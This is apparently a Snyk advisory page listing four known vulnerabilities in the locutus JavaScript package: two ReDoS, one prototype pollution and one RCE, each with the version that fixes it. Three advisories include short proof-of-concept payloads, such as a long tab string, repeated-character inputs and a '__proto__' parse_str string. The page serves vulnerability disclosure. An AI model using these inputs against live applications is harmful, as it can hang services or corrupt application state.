Homepage
About Snyk

locutus@0.0.1 vulnerabilities

Locutus other languages' standard libraries to JavaScript for fun and educational purposes

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the locutus package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the gopher_parsedir function.

PoC by Yeting Li

var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir")
function build_attack(n) {
 var ret = ""
 for (var i = 0; i < n; i++) {
  ret += "\t"
 }
 return ret + "!";
}


var attack_str = build_attack(5000)
// var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a')
var entry = gopher_parsedir(attack_str)

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15
  • M
Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at src/php/network/inet_pton.js:24 is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating characters followed by 'a .' string.

PoC by Robert McLaughlin

``` const inet_pton = require('locutus/php/network/inet_pton'); console.log('starting') for (let i=4; i < 40; i++) { const str = new Array(i).fill('a').join('') + '.'; const start = + new Date();

inet_pton(str);

const elapsed = (+ new Date()) - start;

console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000);

}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15
  • C
Prototype Pollution

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Prototype Pollution via the php.strings.parse_str function.

POC:

const locutus = require('locutus');
locutus.php.strings.parse_str('__proto__[polluted]=true"", {});
console.log(polluted);

How to fix Prototype Pollution?

Upgrade locutus to version 2.0.12 or higher.

<2.0.12
  • H
Remote Code Execution (RCE)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The php/exec/escapeshellarg function allows an attacker to achieve code execution.

How to fix Remote Code Execution (RCE)?

Upgrade locutus to version 2.0.13 or higher.

<2.0.13
Go back to all versions of this package